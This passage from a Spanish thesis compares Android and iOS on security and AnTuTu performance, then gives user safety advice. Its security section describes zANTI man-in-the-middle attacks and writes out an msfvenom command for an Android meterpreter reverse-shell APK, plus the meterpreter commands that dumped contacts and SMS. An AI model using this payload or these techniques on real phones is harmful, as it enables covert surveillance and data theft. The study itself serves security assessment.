Para los procesos, se realizan las pruebas posibles tanto en seguridad de la

información y rendimiento en los teléfonos seleccionados anteriormente de

diferentes sistemas operativos, para obtener datos en cada criterio de evaluación

y obtener resultados claros para cada término del análisis comparativo.

Seguridad de la información

Para evaluar la seguridad de la información en los sistemas operativos, se realizan

diferentes ataques a las dos plataformas utilizando Metasploit y Zanti. A

continuación, se evidencian ataques realizados a Android e iOS, analizando la

seguridad en los pilares de Disponibilidad, Integridad y Confidencialidad.

Procedimiento de análisis

ATAQUES EN SISTEMA OPERATIVO ANDROID.

Disponibilidad

Con la herramienta Zanti, se procede hacer un redireccionamiento HTTP a la IP

víctima. La ip se la obtiene mediante un escaneo de red interna, después

seleccionamos la acción de ataque: Man in the Middle y por último seleccionamos

en ON en la opción Redirigir HTTP.

65

GRÁFICO N° 8

REDIRECCIÓN DE HTTP EN ANDROID

Elaboración: Ruth Asqui

Fuente: Zanti

En el Gráfico N° 8, se observa la interfaz gráfica de la selección en la opción de

Redirigir HTTP, en donde se encuentra la página por defecto

https://www.pentestserver.com/mitm-success.html que Zanti redirecciona.

En el Gráfico N° 9, se observa que la página web no carga y se redirecciona a la

página que establece Zanti por defecto.

Todas direcciones serán redirigidas al servidor de Zanti, es decir a Zimperium

66

Elaboración: Ruth Asqui

Fuente: Android

Elaboración: Ruth Asqui

Fuente: Samsung

También se inserta un HTML, en donde denegamos el acceso a una página web,

enviando un mensaje de “ERROR DE PAGINA” cuando la víctima quiera acceder

a internet.

Se observa en el Gráfico N° 10, que la página www.cursodehacker.com no puede

cargar y aparece el mensaje de error que se insertó en el HTML de Zanti.

GRÁFICO N° 9

DENEGACIÓN DE SERVICIO EN ANDROID

67

Elaboración: Ruth Asqui

Fuente: Samsung

Integridad

Se procede acceder a la página web que el usuario está navegando en ese

momento y se inserta una imagen desde Zanti; cuando la víctima quiera observar

la información en la web le aparecerá la imagen insertada, evitando que observe

la información real de la página web.

GRÁFICO N° 10

DENEGACIÓN DE SERVICIO EN ANDROID

68

Elaboración: Ruth Asqui

Fuente: Zanti y Samsung

En el Gráfico N° 11, se observa a la izquierda la pantalla de Zanti, en donde se

inserta una imagen que reemplazará a la información de la página web que navega

la víctima; a la derecha se encuentra la pantalla del teléfono de la víctima, en

donde se puede apreciar la imagen insertada en el contenido de la página web

real.

GRÁFICO N° 11

PROCESO DE INSERCIÓN DE IMAGEN EN ANDROID

69

Confidencialidad

A continuación, se procede a acceder a la información que la víctima está

navegando en ese instante. Este ataque se lo realiza desde la aplicación Zanti

mediante la acción Man in the Middle y seleccionando la opción de Pedidos

registrados, para acceder a la sesión que la víctima está navegando

Elaboración: Ruth Asqui

Fuente: Zanti

En el Gráfico N° 12, se observa la información accedida de la página web de la

víctima del teléfono Android, como si la búsqueda hubiese sido de parte del

atacante, es decir accede a la página web como él usuario atacado.

GRÁFICO N° 12

INFORMACIÓN ACCEDIDA EN ANDROID

70

Integridad y confidencialidad con Metasploit

Desde la herramienta Metasploit, se realiza un ataque de tipo intruso mediante la

creación de una aplicación con REVERSE TCP, y extensión .apk, permitiendo el

acceso total al dispositivo víctima. La aplicación creada es de tipo stand-alone, la

cual puede ser insertada dentro de cualquier aplicación para ocultarse y ejecutarse

en segundo plano siendo no visible para la víctima.

Se detalla brevemente a continuación:

Se crea un virus para Android mediante comandos básicos a continuación se

detalla algunas de las líneas ejecutadas:

# msfvenom –p Android/meterpreter/reverse_tcp lhost=192.168.1.150 lport=4321

R> /root/Desktop/App1.apk

Elaboración: Ruth Asqui

Fuente: Kali Linux

En el Gráfico N° 13, se observa la Apk creada, lista para ser instalada en el sistema

operativo Android

GRÁFICO N° 13

CREACIÓN DE VIRUS PARA ANDROID

71

Mediante ingeniería social, el atacante logra realizar la instalación del virus en el

teléfono de la víctima. Al momento de finalizar la instalación del virus, como se

observa en el Gráfico N° 14, la víctima quedará vulnerable de la información

almacenada en el dispositivo.

Elaboración: Ruth Asqui

Fuente: Android

GRÁFICO N° 14

PROCESO DE INSTALACIÓN DE VIRUS EN ANDROID

72

Como se observa en el Gráfico N° 14, la instalación del virus es exitosa. El

atacante está en escucha del sistema operativo Android y puede tener acceso a

los siguientes comandos que se muestra en el Gráfico N° 15.

Elaboración: Ruth Asqui

Fuente: Kali Linux

En la Grafica N° 15, se detalla algunos de los comandos que se puede ejecutar;

entre ellos se trabajó con webcam_snap, webcam_stream, dump_contacts,

dump_sms y hide app icom y send_sms.

El atacante puede enviar mensajes como si fuera un teléfono móvil, solo con saber

el número de teléfono de la víctima.

Este ataque se realiza abriendo la consola de metasploit y ejecutando el comando

Send_sms –d numero_tetefono_victima –t “hola”

GRÁFICO N° 15

COMANDOS DE ACCESO EN ANDROID

73

Se puede enviar mensajes las veces que el atacante desee, es por lo cual se ha

interactuado con el sistema operativo Android, tan solo con la ejecución de

comandos de conocimientos básicos.

Mediante este ataque se puede vulnerar al sistema operativo en la información

almacenada; ya que al enviar un mensaje se puede insertar virus que afecten la

disponibilidad, integridad y confidencialidad del sistema operativo, todo depende

que información el atacante desee vulnerar.

Elaboración: Ruth Asqui

Fuente: Kali Linux

En el Gráfico N° 16, se observa que la víctima recibe un mensaje como si fuera

de su mismo número de teléfono, lo cual fue enviado por el atacante informático.

Mediante una línea de comandos en Metasploit, se logró descargar la lista de

contactos del Android sin que se entere la victima lo que ocurre con la información.

A continuación, se observa los contactos, pero incompletos porque son datos

reales y no se pueden divulgar por confidencialidad.

GRÁFICO N° 16

ENVIO DE MENSAJE A ANDROID

74

Elaboración: Ruth Asqui

Fuente: Kali Linux

En el Gráfico N° 17, se observa la descarga de contactos que fue exitosa, también

se procede a vulnerar los mensajes, grabar en vivo y capturar imágenes del

teléfono de la víctima.

A continuación, se presenta la pantalla de la información que se logró acceder.

GRÁFICO N° 17

LISTA DE CONTACTOS DESCARGADOS DE LA VÍCTIMA

75

Elaboración: Ruth Asqui

Fuente: Kali Linux

En el Gráfico N° 18, se observa los archivos descargados como la lista de

contactos, lista de mensajes, una foto en formato jpg y la captura de la cámara en

formato jpeg

ATAQUES EN IOS.

Disponibilidad

Se bloqueó el acceso al navegador, mediante la herramienta Zanti enviando un

mensaje cuando la victima quiera navegar en la web. Para enviar este mensaje se

utilizo la opcion Man in the Middle y luego la opcion Insertar HTML (Inserta html

especificado en paginas web).

GRÁFICO N° 18

PANTALLA DE INFORMACIÓN ACCEDIDA DE ANDROID

76

Elaboración: Ruth Asqui

Fuente: iOS

En el Gráfico N° 19, se observa que se denegó el servicio de acceso a la página

web, enviando un mensaje de ERROR DE PÁGINA.

Integridad

Se puede enviar cualquier imagen cuando la víctima quiera acceder a internet y

toda página web que acceder será reemplazada por la imagen que inserte en

Zanti, dejando observar la información correcta por una errónea.

GRÁFICO N° 19

DENEGACIÓN DE SERVICIO EN iOS

77

Elaboración: Ruth Asqui

Fuente: Zanti y iOS

En el Gráfico N° 20, se observa la pantalla de Zanti en donde se inserta una

imagen que reemplazará a la información de la víctima de iOS; pero a la derecha

está la pantalla del teléfono iOS, es donde se insertó la imagen en la información

de la página web que la víctima quiere acceder.

Confidencialidad

Se logró acceder a la página web que la víctima está navegando en su teléfono

móvil. Mediante Zanti desde la opción Man in the Middle y Pedidos registrados,

para acceder a la información que la víctima está navegando en la web.

GRÁFICO N° 20

PROCESO DE INSERCIÓN DE IMAGEN EN iOS

78

Elaboración: Ruth Asqui

Fuente: Zanti

En el Gráfico 21, se observa que se pudo acceder a la página web que la víctima

está navegando en internet.

Rendimiento

Se realiza los tests en teléfonos móviles en los aspectos de 3D, UX, CPU y RAM

GRÁFICO N° 21

INFORMACIÓN ACCEDIDA EN IOS

79

Procedimiento de análisis

TESTS REALIZADOS EN ANDROID E iOS

Primer caso

Análisis comparativo de dos teléfonos inteligentes, con sistema operativo Android

(Samsung Galaxy J5) e iOS (iPhone 5).

El análisis de cada teléfono se realiza en tiempos diferentes y no continuos

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

Elaboración: Ruth Asqui

Fuente: Antutu

En el Gráfico N° 22, se observa los resultados de rendimiento de un test en el

Android, en el que se detalla cada criterio que analiza Antutu para obtener el

rendimiento total de todo el teléfono.

GRÁFICO N° 22

TEST EN ANTUTU - SAMSUNG GALAXY J5

80

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En el cuadro N° 14, se observa los puntajes de rendimiento de los cinco tests que

se realizaron en Android de modelo Samsung Galaxy J5.

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

26288 25703 25273 25466

20247

0

5000

10000

15000

20000

25000

30000

8 7 9 7 5:45

PU

NTU

AC

IÓN

TIEMPO (MIN)

Android

ASPECTOS PUN N° 1 PUN N° 2 PUN N° 3 PUN N° 4 PUN N° 5

3D 845 815 361 842 0

UX 11155 11324 11245 10982 9753

CPU 11319 11034 10853 11136 7878

RAM 2969 2530 2514 2506 2616

PUNTAJE 26288 25703 25273 25466 20247

TIEMPO 8 min 7 min 9 min 7 min 5:45 min

GRÁFICO N° 23

DIAGRAMA DE RENDIMIENTO/TIEMPO – SAMSUNG GALAXY J5

CUADRO N° 14

RESULTADOS DE TESTS - SAMSUNG GALAXY J5

81

Según el análisis, se obtiene como resultado que el puntaje de rendimiento en el

modelo de Android estudiado va disminuyendo, la cantidad en puntaje, no se

mantiene y el tiempo varía por cada prueba realizada

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En el Gráfico N° 24, se observa el resultado de rendimiento de uno de los test

realizados en iOS del teléfono iPhone 5 en Antutu Benchmark, teniendo un

rendimiento de 30243 de puntuación.

GRÁFICO N° 24

TEST EN ANTUTU - IPHONE 5

82

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En el Cuadro N° 15, se encuentran registrados los rendimientos de los cinco tests

realizados en la aplicación Antutu Benchmark y el tiempo que tarda en la ejecución

de cada test.

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

30390

30197

30357

30328

30243

30100

30150

30200

30250

30300

30350

30400

30450

4:35 4 5 4 4

PU

NTU

AC

IÓN

TIEMPO (MIN)

iOS

GRÁFICO N° 25

DIAGRAMA DE RENDIMIENTO/TIEMPO EN IPHONE 5

CUADRO N° 15

RESULTADOS DE TESTS - IPHONE 5

ASPECTOS PUN N° 1 PUN N° 2 PUN N° 3 PUN N° 4 PUN N° 5

3D 2044 2045 2059 2068 2046

UX 10020 10360 10401 10236 9950

CPU 12425 12272 12373 12319 12312

RAM 5901 5520 5524 5705 5935

PUNTAJE 30390 30197 30357 30328 30243

TIEMPO 4:35 min 4 min 5 min 4 min 4 min

83

En el Gráfico N° 25, se detallan los resultados obtenidos en iOS del teléfono

iPhone 5, lo cual va disminuyendo el rendimiento, pero después aumenta, es un

estado variado según el número de test que se ejecuten, pero el tiempo de

ejecución no varía muy a menudo.

Segundo caso

A continuación, se realizará el análisis de rendimiento entre el iPhone 6s y

Samsung Galaxy J7. El iOS, iPhone 6S en este caso es de mayor capacidad en

software y hardware, por lo que en el análisis este resultaría con una puntuación

mayor que el Android, Samsung Galaxy J7. El análisis se realiza para verificar qué

tan superior es en rendimiento el teléfono iOS en comparación de Android.

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

GRÁFICO N° 26

TEST EN ANTUTU - SAMSUNG GALAXY J7

84

En el Gráfico N° 26, se observa el resultado de un test realizado mediante Antutu

Benchmark, por lo cual nos da un resultado de rendimiento en total 39236 del

teléfono Samsung Galaxy J7.

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En el cuadro N° 16, se observa los resultados de rendimiento en los tests

realizados en Samsung Galaxy J7, con su tiempo que tarda en realizar cada

prueba en Antutu Benchmark.

ASPECTOS PUN N° 1 PUN N° 2

3D 4523 4475

UX 14512 14141

CPU 14869 14399

RAM 5332 4949

PUNTAJE 39236 37964

TIEMPO 6:37 min 5:10 min

CUADRO N° 16

RESULTADOS DE TESTS - SAMSUNG GALAXY J7

85

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En el Gráfico N° 27, del análisis de Android con el modelo de Samsung Galaxy J7,

se realizó solo dos pruebas ya que ocurre lo mismo con el rendimiento de

Samsung Galaxy J5; es decir los resultados continúan disminuyendo de acuerdo

con el número de pruebas que se realice.

39236

37964

37000

37500

38000

38500

39000

39500

6:37 5:10

REN

DIM

ENTO

TIEMPO (MIN)

Android

GRÁFICO N° 27

DIAGRAMA DE RENDIMIENTO/TIEMPO EN SAMSUNG GALAXY J7

86

RESULTADO-iPHONE 6s

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En el Gráfico N° 28, se observa el resultado de rendimiento de un test realizado

en iOS del iPhone 6s dando como resultado 76313 en la puntuación, prueba

ejecutada en Antutu BenchmarK.

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

ASPECTOS PUN N° 1 PUN N° 2

3D 22356 23832

UX 23425 24008

CPU 21450 20980

RAM 7603 7493

PUNTAJE 74834 76313

TIEMPO 4:40 min 4:45 min

GRÁFICO N° 28

TEST EN ANTUTU – iPHONE 6S

CUADRO N° 17

RESULTADOS DE TESTS - IPHONE 6S

87

En el Cuadro N° 17, se observa el resultado de los dos tests que se ejecutó en

Antutu Benchmark, obteniendo en el primer test un rendimiento de 74834 en 4: 40

min y en el último un rendimiento de 76313 en 4:45 min

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En el Gráfico N° 29, iPhone 6s va de subida es decir va dejando por debajo al

teléfono SM Galaxy J7.

En los resultados esperados era evidente que iPhone iba a superar a Android,

pero fue de manera rotunda casi duplicando su puntuación de rendimiento.

Tercer caso

A continuación, se realizará el último análisis ahora escogeremos al Android más

potente en la marca de Samsung actualmente y a un iPhone de menor

características en cuanto a hardware y software. La comparación será entre el

iPhone 7 y Samsung Galaxy S8, pero se pondrá a prueba los dos teléfonos de

manera consecutiva; es decir el test arrancará al mismo tiempo para los dos

GRÁFICO N° 29

DIAGRAMA DE RENDIMIENTO/TIEMPO – iPHONE 6S

74834

76313

74000

74500

75000

75500

76000

76500

4:40 4:45

REN

DIM

IEN

TO

TIEMPO (MIN)

iOS

88

móviles, el tiempo de descanso será la diferencia en que para el teléfono que

termine la prueba primero. Se realizarán cinco pruebas para obtener resultados.

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En el Cuadro N° 18 de resultados, se observa que el teléfono en la puntuación

inicial es muy alto debido a que es un celular de características superiores a los

demás que se ha hecho referencia en el estudio. Pero en el trascurso del análisis

en tiempos continuos va disminuyendo.

CUADRO N° 18

RESULTADOS DE TESTS - SAMSUNG GALAXY S8 `

ASPECTOS PUN N° 1 PUN N° 2 PUN N° 3 PUN N° 4 PUN N° 5

3D 69424 72214 46426 46243 46241

UX 43101 43509 35811 35306 35330

CPU 30618 30671 21592 21511 21622

RAM 8032 7844 4976 4773 4772

PUNTAJE 151175 154238 108805 107833 107965

TIEMPO 0:05:47 min 0:11:17 min 0:16:54 min 0:22:36 min 0:28:16 min

89

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En el Gráfica N° 30, se observa un test realizado en iPhone 7 mediante Antutu en

el cual me da un rendimiento de 102690 de puntuación, resultado de uno de los

tests realizados en este teléfono móvil.

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

GRÁFICO N° 30

TEST EN ANTUTU – iPHONE 7

CUADRO N° 19

RESULTADOS DE TESTS - IPHONE 7

ASPECTOS PUN N° 1 PUN N° 2 PUN N° 3 PUN N° 4 PUN N° 5

3D 41256 46232 42009 35084 42067

UX 41638 42919 31137 31232 31237

CPU 28385 33936 22752 26717 26473

RAM 9642 10011 9175 9657 9650

PUNTAJE 120921 133098 105073 102690 109427

TIEMPO 0:05:00 min 0:10:00 min 0:14:30 min 0:19:06 min 0:23:41 min

90

En el Cuadro N° 19 de resultados, se observa que el teléfono va aumentando en

el trascurso del tiempo en el estudio y los resultados van aumentando; hasta

mantenerse en una puntuación que se mantiene.

4. Resultados del análisis.

Se justificará los resultados obtenidos en el análisis comparativo en cada sistema

operativo en términos de seguridad de la información y rendimiento.

ANÁLISIS DE SEGURIDAD DE LA INFORMACIÓN

Para obtener los resudados finales se ha realizado el estudio en los teléfonos tanto

en Android como en iOS, para comparar la seguridad de la información con

respecto a confidencialidad, integridad y disponibilidad en cada plataforma.

Elaboración: Ruth Asqui

Fuente: Zanti y Kali Linux

En el Gráfico N° 31, se observa que se realizaron ataques informáticos a Android

e iOS, con Metasploit de Kali Linux donde se obtuvo ataques exitosos con respecto

GRÁFICO N° 31

ATAQUES INFORMÁTICOS EXITOSOS EN ANDROID E iOS

91

a la confidencialidad, mientras con la Aplicación Zanti se obtuvieron ataques

exitosos para Android e iOS en disponibilidad, integridad y confidencialidad.

Elaboración: Ruth Asqui

Fuente: Zanti y Kali Linux

En el Gráficos N° 32, con Metasploit de Kali Linux se representa ataques fallidos

en Android con respecto a los pilares disponibilidad e integridad; mientras con la

aplicación Zanti no se obtuvieron ataques fallidos ni en Android e iOS.

Disponibilidad

Se obtuvieron resultados favorables en los dos sistemas operativos, logrando la

denegación de servicios con los ataques informáticos realizados.

Integridad

Este pilar se realizó varios test en Android e iOS, por lo que se determina que los

dos sistemas operativos son vulnerables mediante ataques informáticos tan solo

con las dos herramientas utilizadas; adquiriendo información de los usuarios.

Confidencialidad

GRÁFICO N° 32

ATAQUES INFORMÁTICOS FALLIDOS EN ANDROID E iOS

92

Los resultados de los ataques informáticos con las dos herramientas, se logró

adquirir información de los dos sistemas operativos y por lo tanto son vulnerables

las dos plataformas.

ANÁLISIS DE RENDIMIENTO

Para obtener los resultados finales se ha realizado el estudio de teléfonos tanto

en Android como en iOS, con características similares y en tiempos variados; y

con características diferentes y en tiempos continuos para obtener resultados

claros y precisos en el rendimiento de las dos plataformas.

Análisis del primer caso

ANDROID HARDWARE > iOS HARDWARE

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

1 2 3 4 5

iOS 30390 30197 30357 30328 30243

Android 26288 25703 25273 25466 20247

30390 30197 30357 30328 30243

26288 25703 25273 25466

20247

0

5000

10000

15000

20000

25000

30000

35000

REN

DIM

IEN

TO

NÚMERO DE TEST

iOS

Android

GRÁFICO N° 33

ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY J5 E iPHONE 5

93

Según los resultados obtenidos en la evaluación de los dos sistemas operativos,

se obtiene en primer lugar el sistema operativo iOS, que a pesar de que en

hardware sea de menor capacidad, en rendimiento es el mayor

Esto ocurre a que iOS tiene un mejor diseño e integración del hardware con el

software, es por eso que tiene mayor puntaje en el rendimiento, aunque ha sufrido

mayor recalentamiento de la batería que Android y resulta siendo el mejor en

desempeño.

Análisis del segundo caso

ANDROID HARDWARE< iOS HARDWARE

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En este caso, se observa claramente que iOS vence con una puntuación duplicada

con respecto a Android, esta prueba se realizó para saber qué tan por encima está

la plataforma iOS; y los resultados fueron claros. Otra vez que claro la arquitectura

de la plataforma vencedora.

1 2

iOS 74834 76313

Android 39236 37964

74834 76313

39236 37964

0

10000

20000

30000

40000

50000

60000

70000

80000

90000

REN

DIM

IEN

TO

NUMERO DE TEST

iOS

Android

GRÁFICO N° 34

ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY J7 E iPHONE 6S

94

Análisis del tercer caso

ANDROID HARDWARE > iOS HARDWARE

Elaboración: Ruth Asqui

Fuente: Antutu Benchmark

En este último análisis, Android empieza con un rendimiento mayor, pero iOS está

por debajo, pero con una pequeña diferencia; en el trascurso de tiempos continuos

y la cantidad de test realizados a ambos sistemas en el mismo momento. Android

empieza a disminuir mientras que iOS aumenta su puntuación hasta llegar casis

al empate en los dos sistemas operativos.

1 2 3 4 5

Android 151175 154238 108805 107833 107965

iOS 120921 133098 105073 102690 109427

151175 154238

108805 107833 107965

120921133098

105073 102690109427

0

20000

40000

60000

80000

100000

120000

140000

160000

180000

REN

DIM

IEN

TO

NÚMERO DE TEST

Android

iOS

GRÁFICO N° 35

ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY S8 E iPHONE 7

95

GUÍA DE RECOMENDACIONES DE SEGURIDAD DE LA INFORMACIÓN Y

RENDIMIENTO DE LOS SISTEMAS OPERATIVOS ANDROID E IOS PARA

LOS USUARIOS.

Eficiencia, eficacia, utilización de la CPU, Tiempo de ejecución y

Desempeño

✓ Elegir el sistema operativo iOS, con respecto a rendimiento ya que esta

plataforma ejecuta las operaciones en menos tiempo que Android, esto

ocurre dado que la arquitectura de iOS es compacta para sus aplicaciones

y el hardware.

✓ No dejarse enganchar de la gran cantidad de almacenamiento que se

pueda aumentar con tarjetas externas en los dispositivos móviles, ya que

esto al momento que el sistema operativo gestiona el hardware con el

software no compactaría, como cuando se integra el hardware y software

con la misma arquitectura del sistema operativo. Es por eso que iOS

funciona mejor en ese aspecto y encontraríamos la eficiencia y eficacia en

la CPU del teléfono.

✓ Los usuarios que les gusta distraerse en juegos que requieran gran

velocidad para interactuar desde sus teléfonos, está presente la plataforma

iOS ya que tiene un gran desempeño en la interfaz gráfica.

Disponibilidad, integridad y confidencialidad

✓ No acceder a redes públicas debido a que cualquier persona mal

intencionada como el ciberdelincuente puede estar conectada a la red y

los usuarios pueden ser víctima a ataques informáticos. Ya que Android

como iOS, son sistemas vulnerables a cualquier ataque informático, es la

razón que los usuarios deben tener cuidado al momento de acceder a

estas redes y no utilizar servicios que presta el teléfono donde se puede

ver afectada seguridad de la información y su dinero.

96

✓ Realizar las actualizaciones temporalmente que brindan Google y Apple

en los sistemas operativos Android e iOS, ya que se lograría cubrir las

vulnerabilidades que se han encontrado anteriormente a la última

actualización realizada, respecto a la seguridad de la información.

✓ En Android, siempre tener cuidado y limitarse en la instalación de las

aplicaciones fuera de la Store y revisar los permisos de acceso; ya que

éstas pueden ser códigos maliciosos y tener control absoluto a la

información almacenada en el dispositivo móvil.

✓ Leer los accesos de recursos del teléfono que tienen las aplicaciones antes

de instalarlas. Debido a que Android obliga al usuario a tener acceso a

ninguno o todos los recursos que la aplicación requiere en el teléfono,

como a contactos, multimedia, localización, etc.; éste medio lo convierte a

Android más vulnerable al instalar aplicaciones que se encuentren fuera e

incluso dentro de la Play Store.

✓ Revisar los accesos de recursos de la aplicación que instala en iOS, para

verificar que información puede ser accedida o no, ya que iOS no muestra

que accesos requiere la aplicación antes de ser instalada. Pero iOS,

después de instalar una aplicación permite al usuario elegir el número de

recursos de acceso del teléfono móvil, puede ser ninguno o más recursos

permitidos. iOS protege al usuario de alguna manera, es la razón que la

seguridad de la información depende mucho del usuario.

✓ Adoptar las configuraciones de seguridad que ofrece Android e iOS de

contraseña, al ingreso de usuario, ya que los sistemas operativos bloquean

el equipo después de varios intentos, de alguna manera nos ayuda a

proteger la información.

✓ Usar antimalware, para la protección del Sistema Operativo de las

empresas más conocidas que brindan este servicio, como puede ser

Kasperky; ya que estos softwares ayudan al igual que se tratase de una

computadora personal y además es gratis.

97

✓ En iOS, adoptar la configuración de copias de seguridad de iThunes, ya

que la información se la puede alojar en un computador, donde se incluye

las configuraciones del teléfono y la mayoría de los datos almacenados en

el mismo; los cuales son accedidos solo por el propietario ya que son

validados con contraseñas por el usuario del dispositivo, ayudando a

proteger la información si ocurre algún ataque informático.

98

CAPITULO IV

RESULTADOS, CONCLUSIONES Y RECOMENDACIONES

Resultados

Los resultados obtenidos en este trabajo de titulación, del análisis comparativo en

Android e iOS en términos de seguridad de la información y rendimiento en los

teléfonos móviles, nos muestra que Android e iOS no son seguros en los

problemas estudiados con respecto a la información registrada por el usuario en

sus dispositivos; pero con respecto a rendimiento se refleja que iOS es el sistema

que brinda mejor rendimiento a los usuarios de teléfonos móviles.

Mediante ataques informáticos realizados tanto en Android como en iOS, se tuvo

ataques exitosos y fallidos al realizar con la misma herramienta en las dos

plataformas; pero se logró vulnerar la disponibilidad, integridad y confidencialidad

con la otra herramienta utilizada en las dos plataformas, determinando que

Android e iOS son vulnerables en la seguridad de la información. Finalmente las

dos plataformas tienen vulnerabilidades en los tres pilares estudiados; es decir

Android e iOS no alcanzan a brindar la seguridad de la información a los usuarios

en los teléfonos móviles.

En el resultado final se puede decir que iOS ha sido la plataforma vencedora en

las tres comparaciones de los seis teléfonos móviles en rendimiento. Esto se debe

a que iOS emplea un gran diseño en su arquitectura, y eso lo evidenciamos en el

análisis del teléfono Samsung 8 e iPhone 7. Android empieza con un rendimiento

excelente pero en el transcurso del tiempo se recalienta más que el iOS y baja su

rendimiento final; iOS a pesar de tener una puntuación menor que Android va

aumentando en el transcurso de la evaluación y llega al punto que igualar al

teléfono Android.

Las características superiores de hardware en Android no han logrado vencer a

iOS, esto ocurre, dado que para el análisis de sistemas operativos no depende

tanto del hardware sino del desempeño de la plataforma; en como gestiona el

hardware con el software. Es el indicador que iOS logra vencer en los tres análisis

comparativos.

99

Respecto a las preguntas científicas se contesta a continuación:

Mediante herramientas de seguridad informática y la aplicación Benckmark; si se

pudo determinar las ventajas y desventajas en los términos de seguridad de la

información y rendimiento en los sistemas operativos Android e iOS; las cuales se

denotan en los resultados de los análisis y en la guía de recomendaciones que

ofrecen las dos plataformas.

Mediante el análisis comparativo en los términos de seguridad de la información y

rendimiento de los sistemas operativos Android e iOS; se logró establecer una

guía de recomendaciones lo cual se espera que sirva de ayuda al usuario que

adquiera y posea un teléfono móvil; ya que en ella se específica de alguna manera

que plataforma elegir y seguir algunos consejos que nos brindan los sistemas

operativos.

100

Conclusiones

✓ Mediante herramientas de seguridad informática se realizó análisis de

seguridad de la información en Android e iOS, se pudo evidenciar que los

dos sistemas operativos son vulnerables, para mencionar ventajas y

desventajas que favorezcan a los usuarios que brinden estos sistemas

influye mucho del uso del dispositivo por parte del usuario. La desventaja

que existe en los dos sistemas operativos es que pueden ser atacados en

cualquier momento porque aún no han logrado cubrir la seguridad por

completo por parte de Android e iOS. Pero estos sistemas operativos

brindan la ventaja que el usuario puede proteger su información mediante

las configuraciones que están disponibles en cada plataforma; es la razón

por la que los usuarios deben tener mucho cuidado y seguir

recomendaciones, y aplicar configuraciones para proteger la seguridad de

la información en sus dispositivos.

✓ Se ha logrado realizar el análisis comparativo de rendimiento entre los

sistemas operativos Android e iOS en varias versiones de teléfonos

móviles; midiendo éste término desde la misma aplicación compatible para

las dos plataformas y que poseen en cada tienda. La aplicación Antutu

Benchmark mediante la cantidad de pruebas realizadas, permitió

determinar el sistema operativo que brinda a los usuarios mayor

rendimiento entre las dos plataformas de los equipos móviles siendo este

iOS.

✓ Se logró plantear al usuario una guía de recomendaciones de seguridad

de la información y rendimiento mediante los resultados que se obtuvieron

en el estudio comparativo de los criterios de elección mediante el análisis

cualitativo en cada término.

101

Recomendaciones

✓ Se recomienda realizar un estudio de las vulnerabilidades existentes en

Android e iOS de teléfonos móviles inteligentes, para determinar la

plataforma con mayor número de vulnerabilidades y dar a conocer al

usuario la seguridad de la información que ofrece cada sistema operativo

móvil de acuerdo a los resultados de las vulnerabilidades obtenidas en el

análisis.

✓ Utilizar otras herramientas existentes diferentes a las Benchmark que

miden el rendimiento en los sistemas operativos Android e iOS, para

verificar si los resultados coinciden con el resultado del estudio realizado

en este trabajo de titulación.

✓ Se recomienda que los resultados obtenidos en el estudio se planteen en

un reporte amigable de seguridad de la información y rendimiento de

Android e iOS; para dar a conocer al usuario los riesgos expuestos en cada

plataforma, mediante análisis que requiera el estudio propuesto.

102

BIBLIOGRAFÍA

Aguirre, J. R. (2006). Libro electrónico de seguridad informática y criptografía.

Universidad Politécnica de Madrid.

Albarracín, J. C., Camargo, J. J., & Parra, L. M. (2013). SEGURIDAD EN

DISPOSITIVOS MÓVILES CON SISTEMAS OPERATIVOS ANDROID E

IOS. Tecnología Investigación y Academia, 1(2).

Alegsa, L. (2013). Definición de standalone (programa). Recuperado 20 de

febrero de 2018, a partir de http://www.alegsa.com.ar/Dic/standalone.php

Aponte, S., & Dávila, C. (2011). Sistemas operativos móviles: funcionalidades,

efectividad y aplicaciones útiles en Colombia. Recuperado de

http://repository. ean. edu.

co/bitstream/handle/10882/761/AponteSanly2011. pdf.

Asamblea Nacional Registro Oficial. (2014). Código Orgánico Integral Penal.

Recuperado a partir de

http://biblioteca.defensoria.gob.ec/handle/37000/497

Barranger, D. (2014). Cómo evaluar el rendimiento de tu Android. Recuperado

14 de diciembre de 2017, a partir de

https://www.softonic.com/articulos/como-evaluar-el-rendimiento-de-tu-

android

Baz, A., Ferreira, I., Alvarez, M., & García, R. (2011). Dispositivos móviles.

EPSIG Ing. Telecomunicación Universidad de Oviedo.

BBC, M. (2015). bbc android e ios - Buscar con Google. Recuperado 19 de

noviembre de 2017, a partir de

https://www.google.com.ec/search?q=bbc+android+e+ios&oq=bbc+androi

d+e+ios&aqs=chrome..69i57.12755j0j8&sourceid=chrome&ie=UTF-8

103

Bermúdez, Y. M., & López, J. G. (2011). Análisis comparativo entre sistemas

operativos de dispositivos móviles Android, Iphone y Blackberry (B.S.

thesis). Pereira: Universidad Tecnológica de Pereira.

Blanco, P., Camarero, J., Fumero, A., Werterski, A., & Rodríguez, P. (2009).

Metodología de desarrollo ágil para sistemas móviles. Introducción al

desarrollo con Android y el iPhone. Dr. en Ing. Sist. Telemáticos, 1–30.

Cárdenas, D. D. (2012). Análisis de Seguridad de la información en los

Dispositivos Móviles Smartphone (B.S. thesis). Quito: Universidad Israel,

2012.

Carvajal, K. J., & Sasig, C. F. (2012). Análisis comparativo entre las plataformas

de desarrollo de aplicaciones móviles para los sistemas operativos

Android y IOS. (B.S. thesis). Escuela Superior Politécnica de

Chimborazo.

Casas, S. I., & Enriquez, J. G. (2014). Usabilidad en aplicaciones móviles.

Informes Científicos-Técnicos UNPA, 5(2), 25–47.

Conde, R. (2017). Parámetros reales para identificar gamas de los celulares.

Recuperado 19 de febrero de 2018, a partir de

